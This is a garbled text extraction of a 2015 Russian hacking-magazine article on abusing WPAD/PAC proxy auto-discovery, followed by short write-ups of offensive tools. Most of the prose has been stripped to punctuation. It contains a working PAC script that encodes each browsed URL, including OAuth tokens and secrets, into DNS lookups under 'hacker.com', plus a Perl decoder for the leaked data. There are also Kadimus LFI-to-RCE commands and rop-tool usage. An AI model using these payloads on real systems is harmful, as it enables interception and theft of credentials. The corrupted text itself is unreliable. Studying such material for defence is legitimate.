(SHA-1, 1024- RSA) ; ; -
; -; .
, - MITM-. , - .
SuperfiSh
In The end , , -, , , , - . , - MITM- , , - , . nix- . , , credentials. , :).
06 /197/ 2015 77
WPAD--.,,,-,-HTTPS-.
WPAD WPAD
@cdump, [email protected]
Panim
oni@
shuttersto
ck.com
06 /197/ 201578
PAC-,URL,-,.:
function FindProxyForURL(url, host) { if (host == "xakep.ru") {
return "PROXY proxy. com:8080"; } else if (host == "microsoft.com") { return "PROXY anotherproxy.com:5050"; } else { return "DIRECT"; }}
FindProxyForURL, PAC- - . , , -, -google.com proxy1.com, proxy2.com,- , --.
PAC-- - , Firefox - URL. - . -WPAD.
WPAD WPAD PAC- DHCP- ( ), HTTP- http://wpad.%domain%/wpad.dat. - wpad.dat -.
, DHCP,msk.office.work. WindowsXPwpad.msk.office.work ( -
WPAD(WebProxyAutoDiscoveryprotocol),-PAC(ProxyAutoConfig),JavaScript,-, URL. FindProxyForURL
. 1. , -
Windows XP
. 2. , -
Windows 7
1
2
WARNING
- - . , - , -
.
06 /197/ 2015 WPAD 79
DNS),wpad.office.work. http://wpad.msk.office.work/wpad.dat(DNS) http://wpad.office.work/wpad.dat(DNS)
Windows7-:DNS- , WPADLink-Local Multicast Name Resolution,-NetBIOS Name Service.- , WindowsVista. http://wpad.msk.office.work/wpad.dat(DNS) http://wpad/wpad.dat(LLMNR) http://wpad/wpad.dat(NBNS)
-, -. -NetBIOS,-NBNS-Metasploit(.3).
-,WINS-, Windows-WPAD,-WINS-.-: ,, /24, -IP.
861 . .com,.net,.ru,.org,-
.work.school.ninja.vodka.-domain-nameDHCP-.,domain-name .school-wpad.school,WPAD-.,wpad.TLD,(.4).
wpad.co, --wpad.dat. , : wpad.work. -3901IP.
Profit?,- -. ? HTTP-:-,,cookies,.
HTTPSCONNECT.-user-agent.-, , handshake,-.
BAcktoPAc PAC-JavaScript, window,document,
4
5
3
. 3. NBNS-
. 4.
-
WPAD
. 5. -
wpad.work:
. 6. HTTP- -
-
6
06 /197/ 201580
, -: Chrome , , (GET-), Firefox (location.hash). , URLhttp://mail.ru/?a=123#token=secret(..910).
,-,- URL. , isResolvable, URL. URL , -,d.wpad.work,NS-DNS-,-.
,-:
function encode(str) { r = str.toLowerCase() .replace(/([^a-z1-9])/gfunction(m) { return "0" + m.charCodeAt(0)
}) .replace(/([^\.]{60})(.)/g, '$1.$2') .substr(0, 240); return r + (r.slice(-1) != "." ? "." : "") + "hacker.com";}function FindProxyForURL(url, host) { var u = encode(url); return isResolvable(u) ? "DIRECT" : "DIRECT";}
URLhttps://example.ru/?token=123- https058047047example046ru047063token061123.hacker.com,,-Perl:
echo 'https058047047example046ru047063token061123.hacker.com' \| perl -lape 's/\.hacker\.com$//; s/\.//g; s/0(..)/chr($1)/eg;'
,URL(location.hash)-OAuth-. , -Firefox.
WPAD , HTTPS, -,OAuthURL.,-wpad.LTD.
, , , WPAD.,-: .
.local,,-broadcast-,,Bonjour.-,.
wpad. -
(IEChrome).
alert (-)..
isResolvable,-IP-.:
if (isResolvable(host)) return "PROXY proxy.com:8080";
? , , FindProxyForURLURL.-
. 7. HTTPS-
-
. 8. JavaScript-
,
PAC-
. 9.
FindProxyForURL
Chrome
. 10.
FindProxyForURL
Firefox
8
7
9
10
06 /197/ 2015 WPAD 81
Dylib Hijack Scanner DLL hijack Windows, , . : , - DLL- DLL (Microsoft Security Advisory 2269637). , Mac, dylib-. - : LC_LOAD_WEAK_DYLIB; @RPATHS; LC_LOAD_DYLIB + LC_RPATH.
, , - - , - , , .
Dylib hijack scanner (DHS) , - , dylib hijacking .
- Mac, iCloud Photos, Xcode, Word, Excel, Dropbox .
- DLL Hijacking on OS X? #@%& Yeah! (ht tps://s3.amazonaws.com/s3.synack.com/canSecW.pdf) CanSecWest 2015.
rop-toolRop-tool , . - , - .
: gadget ROP-; patch -
; info
; search
.
: , , ; ; Intel AT&T ; ELF, PE MACH-O; big little endian; x86 x86_64.
- Capstone.
:
# rop-tool g ./program# rop-tool s ./program -s "/bin/sh"# rop-tool s ./program -a# 01000 \xaa\xbb\xcc\xdd patchedrop-tool p ./program -o 0x1000 -b "\xaa\xbb\xcc\xdd" -O patched
lFi Kadimus LFI (Local File Inclusion) - .
: URL-; /var/log/auth.log RCE; /proc/self/environ RCE; php://input RCE; data://text RCE; ; ; shell- HTTP-
; (socks4://, socks4a://,
socks5://, socks5h:// http://); socks5 bind connections.
:
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0
:
./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg
PHP-:
./kadimus -t localhost/?pg=php://input%00 -C '' -X input
RFI (Remote File Inclusion) .
X-toolS
D1g1 Digital Security
@evdokimovds
: Patrick Wardle: MacURL: https://objective-see.com/products/dhs.html
: t00sh: LinuxURL: https://github.com/t00sh/rop-tool
: P0cL4bs Team: LinuxURL: https://github.com/P0cL4bs/Kadimus
WARNING
! - ! , - !
1 2 3
06 /197/ 201582
victimS verSion SearcH Java- , - - . , .
Victims-version-search Python-, - JAR-. - victims-cve-db (https://github.com/victims/victims-cve-db). - , - .
- :1. Maven manifest (pom.xml), -
.2.
artifactId.3. META-INF/MANIFEST.MF
artifactId.
: Python 2.6+; PyYAML; SQLite 3; victims-cve-db .
- .